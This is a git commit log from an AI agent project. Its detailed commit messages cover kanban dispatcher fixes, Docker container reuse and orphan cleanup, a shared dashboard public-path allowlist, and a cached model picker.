teknium1	ae6817f7f7	fix(kanban): add --reason flag to unblock for symmetry with block (#30897) `hermes kanban unblock <id> review-required: ...` parsed every trailing word as another task_id (since `task_ids` is `nargs='+'`), then quietly failed on each non-existent id with "cannot unblock review-required: (not blocked/scheduled?)". Reporter saw this as asymmetric with `block <id> <reason...>` which accepts positional reason words. Fix: add a `--reason "..."` flag that, when provided, is appended as a `UNBLOCK: <reason>` comment before the unblock transition. Bulk syntax (`unblock t_a t_b t_c`) is preserved unchanged. Co-authored-by: julio-cloudvisor <211828103+julio-cloudvisor@users.noreply.github.com>	2026-05-28 23:41:44 -07:00
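The argparse shape behind ae6817f7f7 can be illustrated as follows. This is a sketch, not the project's parser: the `prog` name, `build_parser`, and `unblock_comment` are hypothetical, and only `task_ids` with `nargs='+'`, the `--reason` flag, and the `UNBLOCK: <reason>` comment format come from the commit message.

```python
import argparse
from typing import Optional


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(prog="kanban")
    sub = parser.add_subparsers(dest="command", required=True)
    unblock = sub.add_parser("unblock")
    # nargs='+' swallows every positional word, which is why free-text
    # reasons cannot be positional here without breaking bulk syntax.
    unblock.add_argument("task_ids", nargs="+")
    unblock.add_argument("--reason", default=None)
    return parser


def unblock_comment(reason: Optional[str]) -> Optional[str]:
    """Comment to append before the unblock transition, if any."""
    return f"UNBLOCK: {reason}" if reason else None
```

Because the reason is an option rather than a positional, `unblock t_a t_b t_c` still parses as three task ids.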
wysie	a0fc3df878	fix(browser): rewrite Camofox Docker loopback URLs (#25541) Co-authored-by: Wysie <wysie@users.noreply.github.com>	2026-05-29 15:43:55 +10:00
kshitijk4poor	66827f8947	chore: prune unused imports and duplicate import redefinitions Remove unused imports (F401) and duplicate/shadowed import redefinitions (F811) across the codebase using ruff's safe autofixes. No behavioral changes -- imports only. - ~1400 safe autofixes applied across 644 files (net -1072 lines) - __init__.py re-exports preserved (excluded from F401 removal so public re-export surfaces stay intact) - Re-exports that are imported or monkeypatched by tests but look unused in their defining module are kept with explicit # noqa: F401 (gateway/run.py load_dotenv; run_agent re-exports from agent.message_sanitization, agent.context_compressor, agent.retry_utils, agent.prompt_builder, agent.process_bootstrap, agent.codex_responses_adapter) - Unsafe F841 (unused-variable) fixes deliberately skipped -- those can change behavior when the RHS has side effects - ruff lints remain disabled in pyproject.toml (only PLW1514 is selected); this is a one-time cleanup, not a config change Verification: - python -m compileall: clean - pytest --collect-only: all 27161 tests collect (zero import errors) - core entry points import clean (run_agent, model_tools, cli, toolsets, hermes_state, batch_runner, gateway) - static scan: every name any test imports directly from an edited module still resolves	2026-05-28 22:26:25 -07:00
Teknium	a4d8f0f62a	feat(prompt): universal task-completion guidance + local Python toolchain probe (#34340 ) * fix(codex): surface error code in Responses 'failed' status errors When a Codex Responses turn ends with status=failed, the response carries the failure details under `response.error` as `{code, message, param, ...}`. The previous extractor pulled only `message`, so users seeing a rate-limit failure got a bare "Slow down" string indistinguishable from a generic stream truncation; an internal_error with empty message degraded to a dict dump ("{'code': 'internal_error', 'message': ''}"). Extract a `_format_responses_error()` helper that: - prefixes `code` when both code and message are present (e.g. 'rate_limit_exceeded: Slow down') - falls back to the bare `code` when message is empty - accepts both dict and attribute-style payloads (SDK and JSON-RPC paths) - preserves the prior status-only fallback when no error payload exists Apply the same helper at the sibling site in `codex_app_server_session.run_turn()` so codex-CLI subprocess turn failures get the same treatment. Tests: - 8 new unit tests for `_format_responses_error` covering both shapes, empty/missing fields, non-string fields, and the status-only fallback. - 2 regression tests on `_normalize_codex_response` for failed status with and without a code, asserting the exact RuntimeError message. - All 3603 tests in tests/agent/ pass. Adapted from anomalyco/opencode#28757. * feat(prompt): universal task-completion guidance + local Python toolchain probe Two cross-model failure modes get a single-line answer in the cached system prompt. Both gated by config (default on), both add zero overhead when not needed, both verified via real AIAgent prompt builds. ## What changed `TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models. 
Targets two failure modes observed on a real Sarasota real-estate build task: (1) Opus stopped after writing an 85-byte stub and gave a prose response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed through a PEP-668 wall, then returned fabricated listings instead of admitting the blocker. Both behaviors are model-family-agnostic, so the guidance lives outside the existing tool_use_enforcement gate (~192 tokens, paid once per session via prefix cache).

`tools/env_probe.py` — local Python toolchain probe. Detects python3/pip/uv/PEP-668 state and emits ONE short line in the system prompt when something is non-default. Emits NOTHING when the env is clean (zero token cost for normal users). Skipped entirely for remote terminal backends (docker/modal/ssh) — they have their own probe.

Example output on a broken environment (the actual case):

    Python toolchain: python3=3.11.15 (no pip module), python=missing (use python3), pip→python3.12 (mismatch), PEP 668=yes (use venv or uv).

## Config

Both flags live under `agent.` in config.yaml, default True:

    agent:
      task_completion_guidance: true   # universal "finish the job" block
      environment_probe: true          # local Python toolchain hints

Neither addition required a `_config_version` bump — deep-merge fills defaults in for existing user configs.

## Validation

| Test surface | Result |
|---|---|
| tests/tools/test_env_probe.py | 10/10 pass (probe unit) |
| tests/run_agent/test_run_agent.py — new classes | 8/8 pass (integration) |
| TestToolUseEnforcementConfig | 17/17 pass (no regression) |
| TestBuildSystemPrompt | 9/9 pass (no regression) |
| TestInvalidateSystemPrompt | 2/2 pass (no regression) |
| tests/agent/test_prompt_builder.py | 124/124 pass (no regression) |
| tests/hermes_cli/ | 5662/5662 pass (config defaults) |
| E2E AIAgent build (broken env) | Both blocks present, 2,178 chars |
| E2E AIAgent build (clean env) | 771-char net overhead, env probe silent |

	2026-05-28 22:26:09 -07:00
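The error-formatting rules listed for `_format_responses_error()` in the first half of this commit (prefix the code, fall back to the bare code, accept dict and attribute-style payloads) could look roughly like the sketch below. It is an assumption-laden illustration: the function name without the leading underscore, the `_field` helper, and the wording of the status-only fallback are hypothetical, not taken from the repository.

```python
from types import SimpleNamespace
from typing import Any


def _field(payload: Any, name: str) -> str:
    """Read a field from a dict or an attribute-style object; non-strings become ''."""
    if isinstance(payload, dict):
        value = payload.get(name)
    else:
        value = getattr(payload, name, None)
    return value.strip() if isinstance(value, str) else ""


def format_responses_error(error: Any, status: str = "failed") -> str:
    """Build a readable error string from a Responses-style error payload."""
    if error is None:
        # Status-only fallback; the exact wording here is an assumption.
        return f"Responses turn ended with status={status}"
    code = _field(error, "code")
    message = _field(error, "message")
    if code and message:
        return f"{code}: {message}"
    if code:
        return code
    if message:
        return message
    return f"Responses turn ended with status={status}"
```

For example, `format_responses_error({"code": "rate_limit_exceeded", "message": "Slow down"})` yields `rate_limit_exceeded: Slow down`, and an `internal_error` with an empty message yields just `internal_error` instead of a dict dump.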
Teknium	69b74c15a3	fix(kanban): CLI dispatch honors max_in_progress/max_spawn from config; swap missing 'avoid-ai-writing' skill for bundled humanizer (#33488 , #29415 ) (#34337 ) Two small bugs in the kanban dispatcher's CLI surface that were silently degrading two distinct workflows. Bundled because the test files and the surrounding code surface overlap. ## #33488: hermes kanban dispatch ignored kanban.max_in_progress / max_spawn The CLI wrapper in hermes_cli/kanban.py:_cmd_dispatch only passed default_assignee and max_in_progress_per_profile through to dispatch_once. The global concurrency cap (kanban.max_in_progress) and the per-tick spawn limit (kanban.max_spawn) were silently dropped, so operators using 'hermes kanban dispatch' as a one-shot or in a custom loop couldn't reach either cap from config — only the gateway embedded dispatcher honored them. Fix: read both keys from config in the same coerce-positive-int helper that already handled max_in_progress_per_profile. CLI --max still wins over config kanban.max_spawn when both are present (explicit operator signal beats default), but absent --max falls back to config. ## #29415: synthesizer crashed in retry loop on missing skill hermes_cli/kanban_swarm.py:212 hardcoded skills=['avoid-ai-writing'], a skill that doesn't exist in the bundled skills/ directory or any registered hub source. Every synthesizer worker spawn failed at CLI startup with 'Unknown skill(s): avoid-ai-writing' before the agent loop even started — the dispatcher retried up to failure_limit (default 2), then auto-blocked the task, then dependency rules could re-promote it, looping forever until manual intervention. Fix: replace with 'humanizer' which is bundled at skills/creative/humanizer/SKILL.md (description: 'Humanize text: strip AI-isms and add real voice'). That's the obvious intent behind the 'avoid-ai-writing' name, and the skill is platform-portable (linux/macos/windows) so it works on every supported runtime. 
## Tests tests/hermes_cli/test_kanban_cli_dispatch_passthrough.py — 4 cases: - CLI passes max_in_progress / max_spawn / default_assignee / max_in_progress_per_profile from config to dispatch_once - CLI --max flag overrides config kanban.max_spawn - Invalid cap values (0, -1, 'abc', '1.5') silently fall through to None - kanban_swarm.py no longer references 'avoid-ai-writing' AND the replacement 'humanizer' skill exists at the expected on-disk path Kanban suite: 468/468 pass (was 464; +4 new regression tests).	2026-05-28 21:00:46 -07:00
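The cap-coercion and precedence rules described in this commit can be sketched as follows. This is an illustration only: `coerce_positive_int` and `resolve_max_spawn` are hypothetical names, and whether numeric strings such as `"3"` are accepted is an assumption; the commit only states that `0`, `-1`, `'abc'`, and `'1.5'` fall through to `None` and that `--max` beats `kanban.max_spawn`.

```python
from typing import Any, Mapping, Optional


def coerce_positive_int(value: Any) -> Optional[int]:
    """Return a positive int, or None for anything invalid."""
    if isinstance(value, bool):
        return None  # True/False are ints in Python; treat them as invalid
    if isinstance(value, int):
        return value if value > 0 else None
    if isinstance(value, str):
        text = value.strip()
        # Plain ASCII digits only, so '1.5', '-1' and 'abc' are rejected.
        if text.isascii() and text.isdigit():
            number = int(text)
            return number if number > 0 else None
    return None


def resolve_max_spawn(cli_max: Optional[int], config: Mapping[str, Any]) -> Optional[int]:
    """An explicit CLI --max wins; otherwise fall back to kanban.max_spawn."""
    if cli_max is not None:
        return cli_max
    kanban = config.get("kanban") or {}
    return coerce_positive_int(kanban.get("max_spawn"))
```

Returning `None` rather than raising keeps a malformed config value from blocking a dispatch tick; the caller simply behaves as if no cap were set.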
Ben	a618789dba	fix(dashboard-auth): share /api/* public allowlist between legacy and OAuth gates Two parallel public-path allowlists drifted: _PUBLIC_API_PATHS in hermes_cli/web_server.py (legacy _SESSION_TOKEN middleware) and _GATE_PUBLIC_PREFIXES in hermes_cli/dashboard_auth/middleware.py (OAuth gate). The legacy list included /api/status (documented as a non-sensitive read-only liveness target); the OAuth gate's list did not. Effect: every wildcard-subdomain agent surfaced as STARTING/down to the portal even though the dashboard was serving correctly. Nous account service (src/server/agents/fly-provider.ts getInstanceRuntimeStatus) fetches ``/api/status`` without a cookie as its sole liveness probe; the OAuth gate's 401 looked identical to 'agent dead' on the portal side. Fix: lift the allowlist into hermes_cli/dashboard_auth/public_paths.py and have both middlewares import it. _path_is_public now consults the shared frozenset first, then falls back to the gate's auth-bootstrap/static prefix list. Future additions to the public list hit both gates automatically. Endpoint inventory (verified safe to remain public): * /api/status — version, gateway state, active session count, auth-gate shape. Portal liveness probe target. * /api/config/defaults — config-defaults feed for the SPA's Config page * /api/config/schema — config schema for the SPA's Config page * /api/model/info — model catalogue metadata (context windows) * /api/dashboard/themes — theme manifests for the skin engine * /api/dashboard/plugins — plugin manifests for the dashboard No user data, no session content, no secrets. Same shape an external monitoring agent would hit on /healthz. 
Tests: * New: test_gated_status_is_public (regression guard with the NAS fly-provider.ts liveness-probe rationale spelled out in the docstring) * New: test_other_public_api_paths_are_public_under_gate (parametrised over the rest of PUBLIC_API_PATHS — proves 401 / 302-to-login is never the response) * New: docker integration check #3 in test_dashboard_oauth_gate_engaged_by_default — /api/status remains 200 under the gate AND reports auth_required=True so the portal can distinguish modes * Updated: test_full_login_round_trip_unlocks_gated_api now probes /api/sessions instead of /api/status (status is public, so it can no longer distinguish 'logged in' from 'gate accidentally disabled') * Updated: TestApi401Envelope (the no-cookie / invalid-cookie / dead-cookie tests) probes /api/sessions for the same reason * Updated: docker integration check #2 in test_dashboard_oauth_gate_engaged_by_default probes /api/sessions to prove the gate is intercepting * Removed: dead _login() helper in test_dashboard_auth_status_endpoint.py (no longer needed since /api/status is reachable cold) Companion to docs/handover/hermes-agent-dashboard-s6-insecure-fix.md (the --insecure flag fix that shipped earlier).	2026-05-29 12:17:12 +10:00
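The shared-allowlist idea can be sketched in a few lines. The six paths are the ones inventoried in the commit message; the prefix tuple and the un-prefixed function name are hypothetical placeholders, since the commit does not list the gate's auth-bootstrap/static prefixes.

```python
# Single source of truth that both middlewares would import.
PUBLIC_API_PATHS = frozenset(
    {
        "/api/status",
        "/api/config/defaults",
        "/api/config/schema",
        "/api/model/info",
        "/api/dashboard/themes",
        "/api/dashboard/plugins",
    }
)

# Hypothetical auth-bootstrap/static prefixes; the real list is not shown
# in the commit message.
GATE_PUBLIC_PREFIXES = ("/login", "/static/")


def path_is_public(path: str) -> bool:
    """Check the shared exact-match set first, then the gate's prefix list."""
    if path in PUBLIC_API_PATHS:
        return True
    return any(path.startswith(prefix) for prefix in GATE_PUBLIC_PREFIXES)
```

Because both gates read the same frozenset, adding a path in one place changes the answer for both, which is the drift the commit is guarding against.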
Teknium	3b6347af15	feat(kanban): default_assignee fallback + per-profile concurrency cap (#27145 , #21582 ) (#34244 ) Two related dispatcher behaviors that have been missing for a while. ## kanban.default_assignee (#27145) Reporter (@agarzon): dashboard creates a task without an assignee, task parks in 'ready' forever even though the operator's intent ('default') is perfectly clear. The dispatcher already had a 'skipped_unassigned' bucket but no fallback routing — users had to manually type 'default' in the assignee field every time. Behavior: when 'kanban.default_assignee' is set in config.yaml, the dispatcher applies that assignee to any unassigned ready task before deciding whether to spawn. The row is mutated (assignee column + an 'assigned' event with source='kanban.default_assignee' for the audit trail). Empty/whitespace config value = no fallback, preserving the existing skipped_unassigned behavior. Dry-run mode reports what WOULD happen via the new 'auto_assigned_default' bucket on DispatchResult, but does NOT mutate the DB — operators using 'hermes kanban dispatch --dry-run' see the routing decision before committing. ## kanban.max_in_progress_per_profile (#21582) Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads saturate one profile's local model / API quota / browser pool while other profiles sit idle. The existing global 'max_in_progress' caps total workers but doesn't balance across profiles. Behavior: when 'kanban.max_in_progress_per_profile' is set to a positive int, the dispatcher tracks per-assignee running counts (one query at tick start) and refuses to spawn for any assignee already at the cap. Tasks blocked this way go to a new 'skipped_per_profile_capped' bucket on DispatchResult as (task_id, assignee, current_running_count) tuples — NOT an operator-actionable failure, just 'try again next tick when the profile has capacity'. Pre-existing 'running' tasks count against the cap (verified via regression test). 
The cap respects dry_run mode by incrementing its in-memory counter on each would-be spawn so dry_run reports the same balanced subset that a real tick would. Invalid cap values (0, negative, non-int, None) are treated as 'no cap', preserving the existing behavior. Backward-compatible for installs that don't set the config. ## Surfaces - 'hermes kanban dispatch' CLI now prints 'Auto-assigned to kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap, N running): ...' lines, plus matching JSON keys in --json output. - Gateway dispatcher logs the configured values at startup ('default_assignee=X', 'max_in_progress_per_profile=N'). - 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with inline docs. ## Validation - tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap baseline, auto-assign + DB mutation, dry-run reports without mutating, whitespace treated as None, explicit assignees untouched, DispatchResult field schema. - tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including 4 parametrized): no-cap baseline, balanced 2-profile fan-out, pre-existing running counts against cap, invalid cap values (0/-1/'abc'/None), capped tasks dispatched on next tick after running task completes, DispatchResult field schema. - Broader kanban suite: 464/464 pass (was 449 baseline; +15 new regression tests across both features). ## Credit #27145 — Jimmy Johansson reported the dispatcher skipped-unassigned gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix that matches the existing config knob. #21582 — @edwardchenchen filed the per-profile cap ask after hitting model 429s on fan-out research projects; @simlu confirmed the same pain on local-model setups.	2026-05-28 19:02:55 -07:00
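The two dispatcher behaviors can be modelled as a pure planning function. The sketch below is a simplified assumption, not the real `dispatch_once`: `plan_tick` and its arguments are hypothetical, while the bucket names (`auto_assigned_default`, `skipped_unassigned`, `skipped_per_profile_capped`) and the `(task_id, assignee, current_running_count)` tuple shape come from the commit message.

```python
from collections import Counter
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple


@dataclass
class DispatchResult:
    spawned: List[Tuple[str, str]] = field(default_factory=list)
    auto_assigned_default: List[str] = field(default_factory=list)
    skipped_unassigned: List[str] = field(default_factory=list)
    skipped_per_profile_capped: List[Tuple[str, str, int]] = field(default_factory=list)


def plan_tick(
    ready_tasks: Iterable[Tuple[str, Optional[str]]],
    running_assignees: Iterable[str],
    default_assignee: Optional[str] = None,
    per_profile_cap: Optional[int] = None,
) -> DispatchResult:
    """Decide what one tick would spawn, without touching any database."""
    running = Counter(running_assignees)  # pre-existing workers count against the cap
    fallback = (default_assignee or "").strip() or None  # whitespace means no fallback
    result = DispatchResult()
    for task_id, assignee in ready_tasks:
        if not assignee:
            if fallback is None:
                result.skipped_unassigned.append(task_id)
                continue
            assignee = fallback
            result.auto_assigned_default.append(task_id)
        if per_profile_cap is not None and running[assignee] >= per_profile_cap:
            result.skipped_per_profile_capped.append((task_id, assignee, running[assignee]))
            continue
        # Count each would-be spawn so a dry run reports the same subset
        # a real tick would produce.
        running[assignee] += 1
        result.spawned.append((task_id, assignee))
    return result
```

Keeping the counter in memory is what lets dry-run and real ticks agree: both walk the same ready list and stop spawning for a profile at the same point.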
Ben	d77d877665	fix(docker): startup orphan reaper for crashed-process containers The cleanup-fix in the previous commit handles the graceful-exit leak: a Hermes process that runs ``atexit`` will now actually wait on the docker stop/rm worker thread, so containers either survive (persist mode) or are fully removed (opt-out mode) by the time the interpreter exits. But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window close. Containers from those exits stay parked with no surviving Python process to reuse or remove them, so they accumulate until the operator intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class — there's no live cleanup() to fix. This commit adds the safety net: a startup orphan reaper that runs once per Hermes process and removes long-Exited hermes-labeled containers that the prior commit couldn't reach. Implementation: * New ``reap_orphan_containers()`` in ``tools/environments/docker.py``. Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional) ``label=hermes-profile=<current>``. Per-container ``docker inspect`` parses ``State.FinishedAt`` (with nanosecond-precision trimming for Python's microsecond-bound ``fromisoformat``); containers older than the threshold get ``docker rm -f``'d. The ``status=exited`` filter is load-bearing — a running container may belong to a sibling Hermes process whose reuse path will pick it up; killing it would crash the sibling mid-command. Single-container failures are logged and the sweep continues to the next candidate. * New ``_maybe_reap_docker_orphans()`` helper in ``tools/terminal_tool.py``. Wired into ``_create_environment()`` for ``env_type == "docker"``. 
Gated by: - ``terminal.docker_orphan_reaper: true`` (default; opt-out for operators running multiple Hermes processes in the same profile who don't trust the conservative defaults) - ``_docker_orphan_reaper_ran`` module flag with double-checked locking — parallel subagents and RL rollouts don't trigger N concurrent docker ps storms - Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor (so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own setup) - Profile scoping — a research profile NEVER reaps the default profile's stragglers - Exception swallow — a janitor failure must never block container creation * New config ``terminal.docker_orphan_reaper`` wired through all four config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py, tests/conftest.py) and pinned by ``test_docker_orphan_reaper_is_bridged_everywhere``. Coverage: * 9 new unit tests in test_docker_environment.py — happy path, recent- container sparing, profile scoping, unparseable-timestamp safety, docker-ps-failure handling, partial-failure continuation, nanosecond timestamp parsing, zero-value FinishedAt rejection. * 6 new integration tests in test_docker_orphan_reaper_integration.py — once-per-process gate, disable-flag respected, lifetime doubling with 60s floor, current-profile filter wiring, exception swallow. * 1 new bridge-invariant regression test. Closes #20561 (combined with the two prior commits on this branch).	2026-05-29 11:49:54 +10:00
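The timestamp handling and age threshold described for the reaper can be sketched as below. This is a hedged illustration rather than the code in `tools/environments/docker.py`: the function names and the regular expression are hypothetical, and it assumes `State.FinishedAt` arrives as an RFC 3339 string with up to nanosecond precision and that the zero value starts with year `0001`.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Optional

_TIMESTAMP = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?(Z|[+-]\d{2}:\d{2})$"
)


def parse_finished_at(raw: str) -> Optional[datetime]:
    """Parse a Docker-style timestamp, trimming nanoseconds to microseconds."""
    match = _TIMESTAMP.match(raw.strip())
    if not match:
        return None  # unparseable: never reap on a guess
    base, fraction, zone = match.groups()
    if base.startswith("0001-"):
        return None  # zero-value FinishedAt means "never finished"
    micros = (fraction or "")[:6].ljust(6, "0")
    offset = "+00:00" if zone == "Z" else zone
    try:
        return datetime.fromisoformat(f"{base}.{micros}{offset}")
    except ValueError:
        return None


def reap_threshold_seconds(lifetime_seconds: int) -> int:
    """Twice the terminal lifetime, with a 60 second floor."""
    return max(60, 2 * lifetime_seconds)


def is_reapable(raw_finished_at: str, now: datetime, lifetime_seconds: int) -> bool:
    finished = parse_finished_at(raw_finished_at)
    if finished is None:
        return False
    return now - finished > timedelta(seconds=reap_threshold_seconds(lifetime_seconds))
```

Returning `False` for anything unparseable mirrors the conservative stance in the commit: a janitor that cannot date a container leaves it alone.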
Ben	ac8e238bc8	fix(docker): reuse containers across processes + fix cleanup leaks The Docker backend docs claim "Single persistent container — ONE long- lived container shared across sessions, /new, /reset, and delegate_task subagents. Stopped/removed on shutdown." In practice the code only honored that contract within a single Python process via the in-memory \`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation spawned a fresh \`hermes-<hex>\` container; older containers piled up in \`Exited\` state and accumulated until manual \`docker rm\` (issue #20561). Three root causes, all addressed by this commit: 1. No cross-process container discovery. 2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\` which raced with parent-process exit — when Python exited promptly the detached shell child got killed mid-\`docker stop\`, leaving stopped containers behind. 3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\` (the bind-mount-persistence flag). Default config sets \`container_persistent: true\`, so the default happy path skipped \`rm\` entirely — even when the user explicitly didn't want cross-process reuse, containers leaked. Fix: * Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When true, init probes \`docker ps -a --filter label=hermes-agent=1 --filter label=hermes-task-id=<task> --filter label=hermes-profile=<profile>\` and reuses a matching container (running → attach; stopped → \`docker start\` → attach; \`docker start\` failure → fall through to a fresh \`docker run\`). Multiple matches prefer the running one, with the stragglers left for the orphan reaper (next commit) to clean up. * Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. 
The \`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs whenever \`persist_across_processes\` is false, regardless of the bind-mount-persistence setting. The leak class is gone in all combinations. * Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit hook calls this on every active env, blocking up to 15s for the cleanup thread before interpreter exit. Without this, \`hermes /quit\` raced the daemon-thread teardown and dropped the stop/rm work. * New config \`terminal.docker_persist_across_processes\` (default \`true\` — restores the documented contract). Set \`false\` for hard per-process isolation. Wired through all four config-bridge sites (cli.py env_mappings, gateway/run.py _terminal_env_map, hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip list); regression-pinned by \`test_docker_persist_across_processes_is_bridged_everywhere\` matching the existing pattern for docker_run_as_host_user / docker_env. Reuse intentionally does NOT compare image / mounts / resources — only the labels. Operators changing those settings should set \`docker_persist_across_processes: false\` (or \`docker rm -f\` the labeled container) to force a fresh start. This keeps the probe cheap and the failure mode obvious. Coverage: 12 new unit tests in tests/tools/test_docker_environment.py covering reuse paths (running, stopped, fallback, opt-out, duplicate preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm, no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one config-bridge regression pin. Refs #20561	2026-05-29 11:49:54 +10:00
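The cross-process discovery step can be sketched as two pure helpers: one that builds the `docker ps` probe and one that picks which match to reuse. The label filters are taken from the commit message; the helper names, the `--format` template, and the `"attach"`/`"start"` action strings are assumptions made for illustration.

```python
from typing import List, Optional, Tuple


def build_probe_command(task_id: str, profile: str) -> List[str]:
    """Argument list for the label-filtered container probe."""
    return [
        "docker", "ps", "-a",
        "--filter", "label=hermes-agent=1",
        "--filter", f"label=hermes-task-id={task_id}",
        "--filter", f"label=hermes-profile={profile}",
        # Assumed output shape: "<container id> <state>" per line.
        "--format", "{{.ID}} {{.State}}",
    ]


def choose_container(ps_output: str) -> Optional[Tuple[str, str]]:
    """Pick a container to reuse: a running one wins, else the first stopped one.

    Returns (container_id, action), or None when the caller should fall
    through to a fresh `docker run`.
    """
    candidates = []
    for line in ps_output.splitlines():
        parts = line.split()
        if len(parts) == 2:
            candidates.append((parts[0], parts[1]))
    if not candidates:
        return None
    for container_id, state in candidates:
        if state == "running":
            return (container_id, "attach")
    container_id, _state = candidates[0]
    return (container_id, "start")
```

Matching on labels alone keeps the probe to a single `docker ps` call, at the cost that image or mount changes are not detected, as the commit message notes.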
Teknium	e71a2bd11b	chore: release v0.15.1 (2026.5.29) (#34222)	2026-05-28 18:11:49 -07:00
Teknium	3a9bc9d88a	fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867 ) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. 
Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain _API_KEY / _TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.	2026-05-28 11:33:16 -07:00
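The disk cache described above (1h TTL, per-provider entries keyed by a credential fingerprint, stale data served on transient failure) can be approximated with the standard library. The sketch below is not the `cached_provider_model_ids()` implementation: the function signatures are hypothetical, and serving stale data only when the fingerprint still matches is an assumption. The `fp`/`at`/`models` keys and the 16-hex-character blake2b digest follow the commit message.

```python
import hashlib
import json
import time
from pathlib import Path
from typing import Callable, Iterable, List, Optional

CACHE_TTL_SECONDS = 3600  # 1h TTL


def credential_fingerprint(parts: Iterable[str]) -> str:
    """Cache-bust identity only: a 16-hex-char blake2b digest of credential inputs."""
    digest = hashlib.blake2b(digest_size=8)
    for part in parts:
        digest.update(part.encode("utf-8"))
        digest.update(b"\0")
    return digest.hexdigest()


def cached_model_ids(
    provider: str,
    fingerprint: str,
    fetch: Callable[[], List[str]],
    cache_path: Path,
    now: Optional[float] = None,
) -> List[str]:
    now = time.time() if now is None else now
    try:
        cache = json.loads(cache_path.read_text())
    except (OSError, ValueError):
        cache = {}
    if not isinstance(cache, dict):
        cache = {}
    entry = cache.get(provider)
    same_credentials = isinstance(entry, dict) and entry.get("fp") == fingerprint
    if same_credentials and now - entry.get("at", 0) < CACHE_TTL_SECONDS:
        return entry["models"]  # warm hit
    try:
        models = list(fetch())
    except Exception:
        models = []
    if not models:
        # Stale data beats no data on a transient failure.
        return entry["models"] if same_credentials else []
    cache[provider] = {"fp": fingerprint, "at": now, "models": models}
    cache_path.write_text(json.dumps(cache))
    return models
```

Keying on the fingerprint means that rotating an API key or re-authenticating invalidates the entry without any explicit cache clear.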
